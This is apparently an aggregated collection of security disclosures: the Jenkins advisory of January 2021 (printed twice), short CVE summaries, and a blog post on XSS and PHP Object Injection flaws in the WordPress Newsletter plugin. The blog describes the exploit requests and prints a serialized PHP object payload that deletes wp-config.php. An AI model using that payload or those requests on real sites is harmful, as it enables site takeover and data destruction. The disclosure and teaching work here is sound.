Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape notification bar response contents, resulting in a cross-site scripting (XSS) vulnerability.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Bumblebee HP ALM Plugin
*   TICS Plugin
*   TraceTronic ECU-TEST Plugin

**Descriptions****XSS vulnerability in notification bar**

**SECURITY-1889 / CVE-2021-21603**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape notification bar response contents (typically shown after form submissions via Apply button).

This results in a cross-site scripting (XSS) vulnerability exploitable by attackers able to influence notification bar contents.

Jenkins 2.275, LTS 2.263.2 escapes the content shown in notification bars.

**Stored XSS vulnerability in button labels**

**SECURITY-2035 / CVE-2021-21608**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape button labels in the Jenkins UI.

This results in a cross-site scripting vulnerability exploitable by attackers with the ability to control button labels. An example of buttons with a user-controlled label are the buttons of the Pipeline input step.

Jenkins 2.275, LTS 2.263.2 escapes button labels in the Jenkins UI.

**Reflected XSS vulnerability in markup formatter preview**

**SECURITY-2153 / CVE-2021-21610**  
**Severity (CVSS):** High  
**Description:**

Jenkins allows administrators to choose the markup formatter to use for descriptions of jobs, builds, views, etc. displayed in Jenkins. When editing such a description, users can choose to have Jenkins render a formatted preview of the description they entered.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not implement any restrictions for the URL rendering the formatted preview of markup passed as a query parameter. This results in a reflected cross-site scripting (XSS) vulnerability if the configured markup formatter does not prohibit unsafe elements (JavaScript) in markup, like Anything Goes Formatter Plugin.

Jenkins 2.275, LTS 2.263.2 requires that preview URLs are accessed using POST and sets Content-Security-Policy headers that prevent execution of unsafe elements when the URL is accessed directly.

In case of problems with this change, these protections can be disabled by setting the Java system properties hudson.markup.MarkupFormatter.previewsAllowGET to true and/or hudson.markup.MarkupFormatter.previewsSetCSP to false. Doing either is discouraged.

**Stored XSS vulnerability on new item page**

**SECURITY-2171 / CVE-2021-21611**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape display names and IDs of item types shown on the New Item page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to specify display names or IDs of item types.

As of the publication of this advisory, the Jenkins security team is not aware of any plugins published via the Jenkins project update center that allow doing this.

Jenkins 2.275, LTS 2.263.2 escapes display names and IDs of item types shown on the New Item page.

**Improper handling of REST API XML deserialization errors**

**SECURITY-1923 / CVE-2021-21604**  
**Severity (CVSS):** High  
**Description:**

Jenkins provides XML REST APIs to configure views, jobs, and other items. When deserialization fails because of invalid data, Jenkins 2.274 and earlier, LTS 2.263.1 and earlier stores invalid object references created through these endpoints in the Old Data Monitor. If an administrator discards the old data, some erroneous data submitted to these endpoints may be persisted.

This allows attackers with View/Create, Job/Create, Agent/Create, or their respective \*/Configure permissions to inject crafted content into Old Data Monitor that results in the instantiation of potentially unsafe objects when discarded by an administrator.

Jenkins 2.275, LTS 2.263.2 does not record submissions from users in Old Data Monitor anymore.

In case of problems, the Java system properties hudson.util.RobustReflectionConverter.recordFailuresForAdmins and hudson.util.RobustReflectionConverter.recordFailuresForAllAuthentications can be set to true to record configuration data submissions from administrators or all users, partially or completely disabling this fix.

**Arbitrary file read vulnerability in workspace browsers**

**SECURITY-1452 / CVE-2021-21602**  
**Severity (CVSS):** Medium  
**Description:**

The file browser for workspaces, archived artifacts, and $JENKINS_HOME/userContent/ follows symbolic links to locations outside the directory being browsed in Jenkins 2.274 and earlier, LTS 2.263.1 and earlier.

This allows attackers with Job/Workspace permission and the ability to control workspace contents (e.g., with Job/Configure permission or the ability to change SCM contents) to create symbolic links that allow them to access files outside workspaces using the workspace browser.

Jenkins 2.275, LTS 2.263.2 no longer supports symlinks in workspace browsers. While they may still exist on the file system, they are no longer shown on the UI, accessible via URLs, or included in directory content downloads.

This fix only changes the behavior of the Jenkins UI. Archiving artifacts still behaves as before.

**Path traversal vulnerability in agent names**

**SECURITY-2021 / CVE-2021-21605**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier allows users with Agent/Configure permission to choose agent names that cause Jenkins to override unrelated config.xml files. If the global config.xml file is replaced, Jenkins will start up with unsafe legacy defaults after a restart.

Jenkins 2.275, LTS 2.263.2 ensures that agent names are considered valid names for items to prevent this problem.

In case of problems, this change can be reverted by setting the Java system property jenkins.model.Nodes.enforceNameRestrictions to false.

**Arbitrary file existence check in file fingerprints**

**SECURITY-2023 / CVE-2021-21606**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins provides a feature for jobs to store and track fingerprints of files used during a build. Jenkins 2.274 and earlier, LTS 2.263.1 and earlier provides a REST API to check where a given fingerprint was used by which builds. This endpoint does not fully validate that the provided fingerprint ID is properly formatted before checking for the XML metadata for that fingerprint on the controller file system.

This allows attackers with Overall/Read permission to check for the existence of XML files on the controller file system where the relative path can be constructed as 32 characters.

Jenkins 2.275, LTS 2.263.2 validates that a fingerprint ID is properly formatted before checking for its existence.

**Excessive memory allocation in graph URLs leads to denial of service**

**SECURITY-2025 / CVE-2021-21607**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins renders several different graphs for features like agent and label usage statistics, memory usage, or various plugin-provided statistics.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not limit the graph size provided as query parameters.

This allows attackers to request or to have legitimate Jenkins users request crafted URLs that rapidly use all available memory in Jenkins, potentially leading to out of memory errors.

Jenkins 2.275, LTS 2.263.2 limits the maximum size of graphs to an area of 10 million pixels. If a larger size is requested, the default size for the graph will be rendered instead.

This threshold can be configured by setting the Java system property hudson.util.Graph.maxArea to a different number on startup.

**Missing permission check for paths with specific prefix**

**SECURITY-2047 / CVE-2021-21609**  
**Severity (CVSS):** Low  
**Description:**

Jenkins includes a static list of URLs that are always accessible even without Overall/Read permission, such as the login form. These URLs are excluded from an otherwise universal permission check.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not correctly compare requested URLs with that list.

This allows attackers without Overall/Read permission to access plugin-provided URLs with any of the following prefixes if no other permissions are required:

*   accessDenied
    
*   error
    
*   instance-identity
    
*   login
    
*   logout
    
*   oops
    
*   securityRealm
    
*   signup
    
*   tcpSlaveAgentListener
    

For example, a plugin contributing the path loginFoo/ would have URLs in that space accessible without the default Overall/Read permission check.

The Jenkins security team is not aware of any affected plugins as of the publication of this advisory.

The comparison of requested URLs with the list of always accessible URLs has been fixed to only allow access to the specific listed URLs in Jenkins 2.275, LTS 2.263.2.

In case this change causes problems, additional paths can be made accessible without Overall/Read permissions: The Java system property jenkins.model.Jenkins.additionalReadablePaths is a comma-separated list of additional path prefixes to allow access to.

**Credentials stored in plain text by TraceTronic ECU-TEST Plugin**

**SECURITY-2057 / CVE-2021-21612**  
**Severity (CVSS):** Low  
**Affected plugin: ecutest**  
**Description:**

TraceTronic ECU-TEST Plugin 2.23.1 and earlier stores credentials unencrypted in its global configuration file de.tracetronic.jenkins.plugins.ecutest.report.atx.installation.ATXInstallation.xml on the Jenkins controller as part of its configuration.

These credentials can be viewed by users with access to the Jenkins controller file system.

TraceTronic ECU-TEST Plugin 2.24 adds a new option type for sensitive options. Previously stored credentials are migrated to that option type on Jenkins startup.

**XSS vulnerability in TICS Plugin**

**SECURITY-2098 / CVE-2021-21613**  
**Severity (CVSS):** High  
**Affected plugin: tics**  
**Description:**

TICS Plugin 2020.3.0.6 and earlier does not escape TICS service responses.

This results in a cross-site scripting (XSS) vulnerability exploitable by attackers able to control TICS service response content.

TICS Plugin 2020.3.0.7 escapes TICS service responses, or strips HTML out, as appropriate.

**Credentials stored in plain text by Bumblebee HP ALM Plugin**

**SECURITY-2156 / CVE-2021-21614**  
**Severity (CVSS):** Low  
**Affected plugin: bumblebee**  
**Description:**

Bumblebee HP ALM Plugin 4.1.5 and earlier stores credentials unencrypted in its global configuration file com.agiletestware.bumblebee.BumblebeeGlobalConfig.xml on the Jenkins controller as part of its configuration.

These credentials can be viewed by users with access to the Jenkins controller file system.

Bumblebee HP ALM Plugin 4.1.6 stores credentials encrypted once its configuration is saved again.

**Severity**

*   SECURITY-1452: Medium
*   SECURITY-1889: High
*   SECURITY-1923: High
*   SECURITY-2021: High
*   SECURITY-2023: Medium
*   SECURITY-2025: Medium
*   SECURITY-2035: High
*   SECURITY-2047: Low
*   SECURITY-2057: Low
*   SECURITY-2098: High
*   SECURITY-2153: High
*   SECURITY-2156: Low
*   SECURITY-2171: High

**Affected Versions**

*   **Jenkins weekly** up to and including 2.274
*   **Jenkins LTS** up to and including 2.263.1
*   **Bumblebee HP ALM Plugin** up to and including 4.1.5
*   **TICS Plugin** up to and including 2020.3.0.6
*   **TraceTronic ECU-TEST Plugin** up to and including 2.23.1

**Fix**

*   **Jenkins weekly** should be updated to version 2.275
*   **Jenkins LTS** should be updated to version 2.263.2
*   **Bumblebee HP ALM Plugin** should be updated to version 4.1.6
*   **TICS Plugin** should be updated to version 2020.3.0.7
*   **TraceTronic ECU-TEST Plugin** should be updated to version 2.24

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2047, SECURITY-2098, SECURITY-2153
*   **Ismail Aydemir at d0nkeysec.org** for SECURITY-1923
*   **Jeff Thompson, CloudBees, Inc., Matt Sicker, CloudBees, Inc., and Wadeck Follonier, CloudBees, Inc.** for SECURITY-1889
*   **Jesse Glick, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2171
*   **Long Nguyen, Viettel Cyber Security** for SECURITY-2057
*   **Matt Sicker, CloudBees, Inc. and Jesse Glick, CloudBees, Inc.** for SECURITY-2035
*   **Son Nguyen (@s0nnguy3n\_)** for SECURITY-2156
*   **Travis Emmert from Apple Information Security** for SECURITY-1452
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2021, SECURITY-2023, SECURITY-2025

CVE-2021-21603: Jenkins Security Advisory 2021-01-13

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape display names and IDs of item types shown on the New Item page, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to specify display names or IDs of item types.

CVE-2021-21611: Jenkins Security Advisory 2021-01-13

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape button labels in the Jenkins UI, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to control button labels.

CVE-2021-21608: Jenkins Security Advisory 2021-01-13

Jenkins TICS Plugin 2020.3.0.6 and earlier does not escape TICS service responses, resulting in a cross-site scripting (XSS) vulnerability exploitable by attackers able to control TICS service response content.

CVE-2021-21613: Jenkins Security Advisory 2021-01-13

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier allows users with Agent/Configure permission to choose agent names that cause Jenkins to override the global `config.xml` file.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Jenkins (core)
*   Bumblebee HP ALM Plugin
*   TICS Plugin
*   TraceTronic ECU-TEST Plugin

**Descriptions****XSS vulnerability in notification bar**

**SECURITY-1889 / CVE-2021-21603**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape notification bar response contents (typically shown after form submissions via Apply button).

This results in a cross-site scripting (XSS) vulnerability exploitable by attackers able to influence notification bar contents.

Jenkins 2.275, LTS 2.263.2 escapes the content shown in notification bars.

**Stored XSS vulnerability in button labels**

**SECURITY-2035 / CVE-2021-21608**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape button labels in the Jenkins UI.

This results in a cross-site scripting vulnerability exploitable by attackers with the ability to control button labels. An example of buttons with a user-controlled label are the buttons of the Pipeline input step.

Jenkins 2.275, LTS 2.263.2 escapes button labels in the Jenkins UI.

**Reflected XSS vulnerability in markup formatter preview**

**SECURITY-2153 / CVE-2021-21610**  
**Severity (CVSS):** High  
**Description:**

Jenkins allows administrators to choose the markup formatter to use for descriptions of jobs, builds, views, etc. displayed in Jenkins. When editing such a description, users can choose to have Jenkins render a formatted preview of the description they entered.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not implement any restrictions for the URL rendering the formatted preview of markup passed as a query parameter. This results in a reflected cross-site scripting (XSS) vulnerability if the configured markup formatter does not prohibit unsafe elements (JavaScript) in markup, like Anything Goes Formatter Plugin.

Jenkins 2.275, LTS 2.263.2 requires that preview URLs are accessed using POST and sets Content-Security-Policy headers that prevent execution of unsafe elements when the URL is accessed directly.

In case of problems with this change, these protections can be disabled by setting the Java system properties hudson.markup.MarkupFormatter.previewsAllowGET to true and/or hudson.markup.MarkupFormatter.previewsSetCSP to false. Doing either is discouraged.

**Stored XSS vulnerability on new item page**

**SECURITY-2171 / CVE-2021-21611**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not escape display names and IDs of item types shown on the New Item page.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to specify display names or IDs of item types.

As of the publication of this advisory, the Jenkins security team is not aware of any plugins published via the Jenkins project update center that allow doing this.

Jenkins 2.275, LTS 2.263.2 escapes display names and IDs of item types shown on the New Item page.

**Improper handling of REST API XML deserialization errors**

**SECURITY-1923 / CVE-2021-21604**  
**Severity (CVSS):** High  
**Description:**

Jenkins provides XML REST APIs to configure views, jobs, and other items. When deserialization fails because of invalid data, Jenkins 2.274 and earlier, LTS 2.263.1 and earlier stores invalid object references created through these endpoints in the Old Data Monitor. If an administrator discards the old data, some erroneous data submitted to these endpoints may be persisted.

This allows attackers with View/Create, Job/Create, Agent/Create, or their respective \*/Configure permissions to inject crafted content into Old Data Monitor that results in the instantiation of potentially unsafe objects when discarded by an administrator.

Jenkins 2.275, LTS 2.263.2 does not record submissions from users in Old Data Monitor anymore.

In case of problems, the Java system properties hudson.util.RobustReflectionConverter.recordFailuresForAdmins and hudson.util.RobustReflectionConverter.recordFailuresForAllAuthentications can be set to true to record configuration data submissions from administrators or all users, partially or completely disabling this fix.

**Arbitrary file read vulnerability in workspace browsers**

**SECURITY-1452 / CVE-2021-21602**  
**Severity (CVSS):** Medium  
**Description:**

The file browser for workspaces, archived artifacts, and $JENKINS_HOME/userContent/ follows symbolic links to locations outside the directory being browsed in Jenkins 2.274 and earlier, LTS 2.263.1 and earlier.

This allows attackers with Job/Workspace permission and the ability to control workspace contents (e.g., with Job/Configure permission or the ability to change SCM contents) to create symbolic links that allow them to access files outside workspaces using the workspace browser.

Jenkins 2.275, LTS 2.263.2 no longer supports symlinks in workspace browsers. While they may still exist on the file system, they are no longer shown on the UI, accessible via URLs, or included in directory content downloads.

This fix only changes the behavior of the Jenkins UI. Archiving artifacts still behaves as before.

**Path traversal vulnerability in agent names**

**SECURITY-2021 / CVE-2021-21605**  
**Severity (CVSS):** High  
**Description:**

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier allows users with Agent/Configure permission to choose agent names that cause Jenkins to override unrelated config.xml files. If the global config.xml file is replaced, Jenkins will start up with unsafe legacy defaults after a restart.

Jenkins 2.275, LTS 2.263.2 ensures that agent names are considered valid names for items to prevent this problem.

In case of problems, this change can be reverted by setting the Java system property jenkins.model.Nodes.enforceNameRestrictions to false.

**Arbitrary file existence check in file fingerprints**

**SECURITY-2023 / CVE-2021-21606**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins provides a feature for jobs to store and track fingerprints of files used during a build. Jenkins 2.274 and earlier, LTS 2.263.1 and earlier provides a REST API to check where a given fingerprint was used by which builds. This endpoint does not fully validate that the provided fingerprint ID is properly formatted before checking for the XML metadata for that fingerprint on the controller file system.

This allows attackers with Overall/Read permission to check for the existence of XML files on the controller file system where the relative path can be constructed as 32 characters.

Jenkins 2.275, LTS 2.263.2 validates that a fingerprint ID is properly formatted before checking for its existence.

**Excessive memory allocation in graph URLs leads to denial of service**

**SECURITY-2025 / CVE-2021-21607**  
**Severity (CVSS):** Medium  
**Description:**

Jenkins renders several different graphs for features like agent and label usage statistics, memory usage, or various plugin-provided statistics.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not limit the graph size provided as query parameters.

This allows attackers to request or to have legitimate Jenkins users request crafted URLs that rapidly use all available memory in Jenkins, potentially leading to out of memory errors.

Jenkins 2.275, LTS 2.263.2 limits the maximum size of graphs to an area of 10 million pixels. If a larger size is requested, the default size for the graph will be rendered instead.

This threshold can be configured by setting the Java system property hudson.util.Graph.maxArea to a different number on startup.

**Missing permission check for paths with specific prefix**

**SECURITY-2047 / CVE-2021-21609**  
**Severity (CVSS):** Low  
**Description:**

Jenkins includes a static list of URLs that are always accessible even without Overall/Read permission, such as the login form. These URLs are excluded from an otherwise universal permission check.

Jenkins 2.274 and earlier, LTS 2.263.1 and earlier does not correctly compare requested URLs with that list.

This allows attackers without Overall/Read permission to access plugin-provided URLs with any of the following prefixes if no other permissions are required:

*   accessDenied
    
*   error
    
*   instance-identity
    
*   login
    
*   logout
    
*   oops
    
*   securityRealm
    
*   signup
    
*   tcpSlaveAgentListener
    

For example, a plugin contributing the path loginFoo/ would have URLs in that space accessible without the default Overall/Read permission check.

The Jenkins security team is not aware of any affected plugins as of the publication of this advisory.

The comparison of requested URLs with the list of always accessible URLs has been fixed to only allow access to the specific listed URLs in Jenkins 2.275, LTS 2.263.2.

In case this change causes problems, additional paths can be made accessible without Overall/Read permissions: The Java system property jenkins.model.Jenkins.additionalReadablePaths is a comma-separated list of additional path prefixes to allow access to.

**Credentials stored in plain text by TraceTronic ECU-TEST Plugin**

**SECURITY-2057 / CVE-2021-21612**  
**Severity (CVSS):** Low  
**Affected plugin: ecutest**  
**Description:**

TraceTronic ECU-TEST Plugin 2.23.1 and earlier stores credentials unencrypted in its global configuration file de.tracetronic.jenkins.plugins.ecutest.report.atx.installation.ATXInstallation.xml on the Jenkins controller as part of its configuration.

These credentials can be viewed by users with access to the Jenkins controller file system.

TraceTronic ECU-TEST Plugin 2.24 adds a new option type for sensitive options. Previously stored credentials are migrated to that option type on Jenkins startup.

**XSS vulnerability in TICS Plugin**

**SECURITY-2098 / CVE-2021-21613**  
**Severity (CVSS):** High  
**Affected plugin: tics**  
**Description:**

TICS Plugin 2020.3.0.6 and earlier does not escape TICS service responses.

This results in a cross-site scripting (XSS) vulnerability exploitable by attackers able to control TICS service response content.

TICS Plugin 2020.3.0.7 escapes TICS service responses, or strips HTML out, as appropriate.

**Credentials stored in plain text by Bumblebee HP ALM Plugin**

**SECURITY-2156 / CVE-2021-21614**  
**Severity (CVSS):** Low  
**Affected plugin: bumblebee**  
**Description:**

Bumblebee HP ALM Plugin 4.1.5 and earlier stores credentials unencrypted in its global configuration file com.agiletestware.bumblebee.BumblebeeGlobalConfig.xml on the Jenkins controller as part of its configuration.

These credentials can be viewed by users with access to the Jenkins controller file system.

Bumblebee HP ALM Plugin 4.1.6 stores credentials encrypted once its configuration is saved again.

**Severity**

*   SECURITY-1452: Medium
*   SECURITY-1889: High
*   SECURITY-1923: High
*   SECURITY-2021: High
*   SECURITY-2023: Medium
*   SECURITY-2025: Medium
*   SECURITY-2035: High
*   SECURITY-2047: Low
*   SECURITY-2057: Low
*   SECURITY-2098: High
*   SECURITY-2153: High
*   SECURITY-2156: Low
*   SECURITY-2171: High

**Affected Versions**

*   Jenkins weekly up to and including 2.274
*   Jenkins LTS up to and including 2.263.1
*   **Bumblebee HP ALM Plugin** up to and including 4.1.5
*   **TICS Plugin** up to and including 2020.3.0.6
*   **TraceTronic ECU-TEST Plugin** up to and including 2.23.1

**Fix**

*   Jenkins weekly should be updated to version 2.275
*   Jenkins LTS should be updated to version 2.263.2
*   **Bumblebee HP ALM Plugin** should be updated to version 4.1.6
*   **TICS Plugin** should be updated to version 2020.3.0.7
*   **TraceTronic ECU-TEST Plugin** should be updated to version 2.24

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-2047, SECURITY-2098, SECURITY-2153
*   **Ismail Aydemir at d0nkeysec.org** for SECURITY-1923
*   **Jeff Thompson, CloudBees, Inc., Matt Sicker, CloudBees, Inc., and Wadeck Follonier, CloudBees, Inc.** for SECURITY-1889
*   **Jesse Glick, CloudBees, Inc. and Wadeck Follonier, CloudBees, Inc.** for SECURITY-2171
*   **Long Nguyen, Viettel Cyber Security** for SECURITY-2057
*   **Matt Sicker, CloudBees, Inc. and Jesse Glick, CloudBees, Inc.** for SECURITY-2035
*   **Son Nguyen (@s0nnguy3n\_)** for SECURITY-2156
*   **Travis Emmert from Apple Information Security** for SECURITY-1452
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2021, SECURITY-2023, SECURITY-2025

CVE-2021-21605: Jenkins Security Advisory 2021-01-13

The sudoedit personality of Sudo before 1.9.5 may allow a local unprivileged user to perform arbitrary directory-existence tests by winning a sudo_edit.c race condition in replacing a user-controlled directory by a symlink to an arbitrary path.

CVE-2021-23239: Stable Release

A Reflected Authenticated Cross-Site Scripting (XSS) vulnerability in the Newsletter plugin before 6.8.2 for WordPress allows remote attackers to trick a victim into submitting a tnpc_render AJAX request containing either JavaScript in an options parameter, or a base64-encoded JSON string containing JavaScript in the encoded_options parameter.

On July 13, 2020, our Threat Intelligence team was alerted to a recently patched vulnerability in Newsletter, a WordPress plugin with over 300,000 installations. While investigating this vulnerability, we discovered two additional, more serious vulnerabilities, including a reflected Cross-Site Scripting(XSS) vulnerability and a PHP Object Injection vulnerability.

We reached out to the plugin’s author on July 15, 2020, and received a response the next day. After fully disclosing the vulnerability on July 16, 2020, the plugin’s author released a patch the next day, on July 17, 2020.

A firewall rule to protect against the Reflected Cross-Site Scripting vulnerability was released to Wordfence Premium customers on July 15, 2020 and will become available to free Wordfence users 30 days later, on August 14, 2020.

Although the PHP Object Injection vulnerability would require additional vulnerable software to be installed, and our built-in PHP Object Injection protection would have protected against the most common exploits, we determined that a bypass was possible. Out of an abundance of caution, we created an additional firewall rule and released it to Wordfence Premium users on July 28, 2020. The PHP Object Injection firewall rule will become available to free Wordfence users on the same date as the XSS rule for this plugin, on August 14, 2020.

**Description**: Authenticated Reflected Cross-Site Scripting(XSS)  
**Affected Plugin**: Newsletter  
**Plugin Slug**: newsletter  
**Affected Versions**: < 6.8.2  
**CVE ID**: CVE-2020-35933  
**CVSS Score**: 6.5(Medium)  
**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L  
**Fully Patched Version**: 6.8.2

The Newsletter plugin includes a full-featured visual editor that can be used to create visually appealing newsletters and email campaigns. It uses an AJAX function, tnpc_render_callback, to display edited blocks based on a set of options sent in the AJAX request. Unfortunately, the vulnerable versions did not filter these options, but passed them onto a second function, restore_options_from_request which used multiple methods to decode options that were passed in before displaying them using the render_block function.

    function tnpc\_render\_callback() {
        $block\_id = $\_POST\['b'\];
        $wrapper = isset($\_POST\['full'\]);
        $options = $this->restore\_options\_from\_request();

        $this->render\_block($block\_id, $wrapper, $options);
        wp\_die()

As such, it was possible for an attacker to get malicious JavaScript to display in multiple ways. The simplest method would involve sending a POST request to wp-admin/admin-ajax.php with the action parameter set to tnpc_render, the b parameter set to html, and the options parameter set to arbitrary JavaScript. Alternatively, a similar request with the options parameter set to an empty array options[]= and the encoded_options parameter set to a base64-encoded JSON string containing arbitrary JavaScript would also result in JavaScript being rendered in a logged-in user’s browser.

            if (isset($\_POST\['encoded\_options'\])) {
                $decoded\_options = $this->options\_decode($\_POST\['encoded\_options'\]);

    function options\_decode($options) {

        // Start compatibility
        if (is\_string($options) && strpos($options, 'options\[') !== false) {
            $opts = array();
            parse\_str($options, $opts);
            $options = $opts\['options'\];
        }
        // End compatibility

        if (is\_array($options)) {
            return $options;
        }

        $tmp = json\_decode($options, true);
        if (is\_null($tmp)) {
            return json\_decode(base64\_decode($options), true);
        } else {
            return $tmp;
        }
    }

We discussed Reflected XSS vulnerabilities in a previous post. Despite the fact that they require an attacker to trick a victim into performing a specific action (such as clicking a specially crafted link), they can still be used to inject backdoors or add malicious administrative users. If an attacker tricked a victim into sending a request containing a malicious JavaScript using either of these methods, the malicious JavaScript would be decoded and executed in the victim’s browser.

**Description**: PHP Object Injection  
**Affected Plugin**: Newsletter  
**Plugin Slug**: newsletter  
**Affected Versions**: < 6.8.2  
**CVE ID**: CVE-2020-35932  
**CVSS Score**: 7.5(High)  
**CVSS Vector**: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H  
**Fully Patched Version**: 6.8.2

Although the Newsletter editor did not allow lower-level users to save changes to a given newsletter, the same tnpc_render_callback AJAX function was still accessible to all logged-in users, including subscribers. This introduced a PHP Object Injection vulnerability via the restore_options_from_request function. This function unserialized data passed in via the options[inline_edits] parameter. As such, an attacker logged-in as a subscriber could send a POST request to wp-admin/admin-ajax.php with the action parameter set to tpnc_render and the options[inline_edits] parameter set to a serialized PHP object.

        if (isset($\_POST\['options'\]) && is\_array($\_POST\['options'\])) {
            // Get all block options
            $options = stripslashes\_deep($\_POST\['options'\]);

            // Deserialize inline edits when
            // render is preformed on saving block options
            if (isset($options\['inline\_edits'\]) && is\_serialized($options\['inline\_edits'\])) {
                $options\['inline\_edits'\] = unserialize($options\['inline\_edits'\]);
            }

Although the Newsletter plugin itself did not use any code that would allow additional exploitation, this vulnerability could be used to inject a PHP object that might be processed by code from another plugin or theme and used to execute arbitrary code, upload files, or any number of other tactics that could lead to site takeover.

**How does PHP Object Injection Work?**

PHP can make use of a method called “serialization” to store complex data. In most cases serialized data consists of key => value arrays, for example:  
a:2:{s:11:"productName";s:5:"apple";s:7:"price";i:10;}  
This serialized data sample includes a productName property which is set to apple and a price property which is set to 10.

Serialized data is useful for storing settings in bulk, and many WordPress settings are stored as serialized data. Unfortunately, serialized data can also cause a security issue because it can be used to store PHP objects.

**What are PHP objects?**

Most modern PHP code is object oriented, meaning that code is organized into “classes.” These classes act like a basic template containing both variables (referred to as “properties”) and functions (referred to as “methods”). A running program can then create “objects” based on these templates, or classes. This creates not only a clear, concise structure for handling data, making code easier to maintain, it allows the same code to be reused for multiple similar tasks.

For instance, an online store could use a single class for products with properties(variables) including $price and $productName, and create a different object for each product. Each object would use the same function(method) to calculate tax, but could use a different price and product name.

If a plugin unserializes data provided by users without sanitizing that user’s input, then an attacker can send a specially crafted payload that would be unserialized into a PHP object.

On its own, an injected PHP object is not particularly dangerous. This changes, however, if the class it is based on uses so-called “magic methods”.

**What are magic methods?**

Magic methods are special functions that can be added to a class that describe what it should do when certain events happen.

For instance, the __destruct function is used in many classes to “clean up” once an object is done being used, and in many cases it does this by deleting files.

Here’s a very basic example of a vulnerable class that calculates product prices, stores a log, and deletes the log when it’s done:

class Product{

    public $price;
    public $productName;
    public $savedPriceFile;

    function \_\_construct($price, $productName){
        $this->price=$price;
        $this->productName=$productName;
        $this->savedPriceFile=$productName."pricefile.log";
    }

    function calculateTotal($quantity) {
        $total=$this->price \* $quantity;
        echo ($total);
        file\_put\_contents($this->savedPriceFile, $total);
    }

    function \_\_destruct(){
        unlink($this->savedPriceFile);
    }

}

If this code was running on a site that also had a PHP Object Injection vulnerability, an attacker could delete the wp-config.php file containing the WordPress site’s core configuration settings by sending a payload similar to the following:

O:7:"Product":3:{s:5:"price";i:2;s:11:"productName";s:6:"apples";s:14:"savedPriceFile";s:13:"wp-config.php";}

This would inject a Product object, with the $productName set to apples, the $price set to 2, and a $savedPriceFile property set to wp-config.php. Even though the object might not be used by anything else, eventually the __destruct function would run, deleting whatever $savedPriceFile was set to. In this case, the deletion of the wp-config.php file would reset the site and allow an attacker to take over by pointing the site’s new configuration to a remote database under their control.

Successfully exploiting this chain of events, also known as a “POP chain”, does require some degree of effort, since it requires:

*   Code that unserializes user input (an Object Injection vulnerability).
*   Code that uses a magic method in an insecure way.
*   Both of these need to be loaded at the same time.

Due to the fact that many plugins and themes load some, or all, of their classes on each request to the site, this is not as great of a restriction as it might appear. Additionally, although insecure usage of these “magic methods” is less common than it was in the past, such usage is not considered a vulnerability on its own since it requires the presence of a PHP Object Injection vulnerability to exploit.

Finally, although an attacker might need to know which plugins are installed in order to tailor their attack to a given POP chain, it is often fairly simple to determine this with scanning tools. The good news is that such vulnerabilities are difficult to automatically exploit in bulk, except in cases where a PHP Object Injection vulnerability and an insecure magic method are both used in the same plugin.

**Timeline**

**July 13, 2020** – Our Threat Intelligence Team begins investigating a recently patched vulnerability in the Newsletter plugin.  
**July 14, 2020** – During our investigation, we discover 2 unpatched vulnerabilities.  
**July 15, 2020** – We release a firewall rule for the reflected XSS vulnerability to Wordfence Premium users and reach out to the plugin’s author.  
**July 16, 2020** – We receive a response from the plugin’s author and provide full disclosure.  
**July 17, 2020** – Plugin author releases a patch for both vulnerabilities.  
**July 28, 2020** – We determine that an additional firewall rule is necessary to ensure full coverage for the PHP Object Injection vulnerability and release it to Wordfence Premium users.  
**August 14, 2020** – Both firewall rules become available to free Wordfence users.

**Conclusion**

In this blog post, we discussed 2 vulnerabilities in the Newsletter plugin, including a reflected XSS vulnerability and a PHP Object Injection vulnerability. We also explained what PHP Object Injection vulnerabilities are and how they can be exploited.

We strongly recommend updating to the latest version of the Newsletter plugin as soon as possible. As of this writing, that is version 6.8.3.

Wordfence Premium users have been protected against the majority of potential attacks since July 15, 2020, and have been fully protected since July 28, 2020. Sites still running the free version of Wordfence will receive firewall rules protecting against both vulnerabilities on August 14, 2020.

